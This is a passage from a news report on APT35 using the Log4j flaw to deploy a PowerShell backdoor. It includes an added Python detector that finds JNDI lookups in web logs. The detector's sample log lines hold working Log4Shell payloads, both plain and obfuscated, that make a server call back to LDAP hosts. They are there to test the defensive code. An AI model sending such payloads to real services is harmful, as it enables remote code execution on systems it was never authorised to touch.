The Iran-backed hacking group Phosphorus, also tracked as APT35, is using the Log4j vulnerability to distribute a new modular PowerShell toolkit, according to security firm Check Point.
APT35 is one of several state-backed hacking groups known to have been developing tools to exploit public-facing Java applications that use vulnerable versions of the Log4j logging library.
Microsoft, which tracks the group as Phosphorus and has called it out for increasingly using ransomware in attacks, found that it had operationalized a Log4j exploit for future campaigns less than a week after Log4Shell's December 9 disclosure.
According to Check Point's analysis, APT35's Log4j work was sloppy and “obviously rushed”: the group used a basic, publicly available JNDI exploit kit (since removed from GitHub), and its attacks were easy to detect and attribute.
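The reason such attacks are easy to detect is that every Log4Shell attempt has to carry a `${jndi:...}` lookup in some request field, and the callback URL inside it points at attacker-controlled infrastructure, which is also what makes them easy to attribute. The following detector is an added example, not code from the article or from Check Point: it scans web-server access-log lines, undoes percent-encoding, collapses the common lookup-obfuscation tricks (`${lower:j}`, `${upper:n}`, `${::-d}`, `${env:NOTEXIST:-i}`) the way Log4j 2's own interpolator would, and reports the JNDI scheme and callback host for each hit. The log lines are constructed samples using documentation IP ranges; only the default-value, `lower:` and `upper:` lookups are modelled, so other lookup prefixes are left untouched rather than evaluated.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Innermost Log4j 2 lookup: a ${...} with no nested braces inside it.
LOOKUP_RE = re.compile(r"\$\{([^${}]*)\}")
# A resolved JNDI lookup: capture the URL scheme and the callback host[:port].
JNDI_RE = re.compile(r"\$\{jndi:([a-z]+)://([^/}\s'\"]+)", re.IGNORECASE)


def _resolve_lookup(body: str) -> Optional[str]:
    """Evaluate one innermost lookup roughly as Log4j 2's Interpolator would.

    Returns the substituted text, or None for a lookup that must be kept
    verbatim (the jndi: lookup itself, or a prefix this example does not model).
    """
    if body.lower().startswith("jndi:"):
        return None
    if ":-" in body:                       # ${prefix:key:-default}; ${::-x} -> "x"
        return body.split(":-", 1)[1]
    if body.lower().startswith("lower:"):  # ${lower:J} -> "j"
        return body[6:].lower()
    if body.lower().startswith("upper:"):  # ${upper:n} -> "N"
        return body[6:].upper()
    return None


def normalize_payload(text: str, max_passes: int = 32) -> str:
    """Collapse nested lookup obfuscation, innermost first, until nothing changes.

    The pass limit bounds tricks such as ${::-$}{...} that synthesise new
    lookups on each round.
    """
    for _ in range(max_passes):
        changed = False

        def repl(m) -> str:
            nonlocal changed
            resolved = _resolve_lookup(m.group(1))
            if resolved is None:
                return m.group(0)
            changed = True
            return resolved

        text = LOOKUP_RE.sub(repl, text)
        if not changed:
            break
    return text


def url_decode(text: str, max_rounds: int = 3) -> str:
    """Undo (possibly repeated) percent-encoding of a request line or header."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def scan_log_lines(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per JNDI lookup found anywhere in each access-log line."""
    findings: List[Dict[str, object]] = []
    for number, line in enumerate(lines, start=1):
        client = line.split(" ", 1)[0]      # first field of a combined-format line
        decoded = normalize_payload(url_decode(line))
        for m in JNDI_RE.finditer(decoded):
            findings.append({
                "line": number,
                "client": client,
                "scheme": m.group(1).lower(),
                "callback": m.group(2),     # attacker host: block it, and use it for attribution
            })
    return findings


# Constructed sample lines (combined log format, documentation IP ranges).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:14:02:11 +0000] "GET /?x=${jndi:ldap://203.0.113.9:1389/Exploit} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:14:02:12 +0000] "GET /api?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.9%3A1389%2FExploit%7D HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Dec/2021:14:05:40 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${lower:n}${::-d}${env:NOTEXIST:-i}:${lower:ldap}://198.51.100.20:1389/a}"',
    '192.0.2.33 - - [10/Dec/2021:14:06:01 +0000] "GET /search?q=%24%7Bprice%7D HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '192.0.2.34 - - [10/Dec/2021:14:06:02 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "curl/7.79.1"',
]

if __name__ == "__main__":
    for finding in scan_log_lines(SAMPLE_LOG):
        print(finding)
```

Run against the samples, the first three lines are flagged (plain, URL-encoded, and obfuscated in the User-Agent header), and the harmless `${price}` on line four is not. In production the same logic belongs in a log pipeline or WAF rule, and the extracted callback hosts are the indicators worth pivoting on when attributing a campaign.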
After exploiting Log4j on public-facing systems, the group deploys what Check Point describes as ‘a PowerShell-based modular backdoor’, which provides persistence, communication with a command and control (C&C) server, and execution of commands and additional modules.
The main module of the attacker's PowerShell framework validates network connections, enumerates characteristics of the compromised system, retrieves the C&C domain from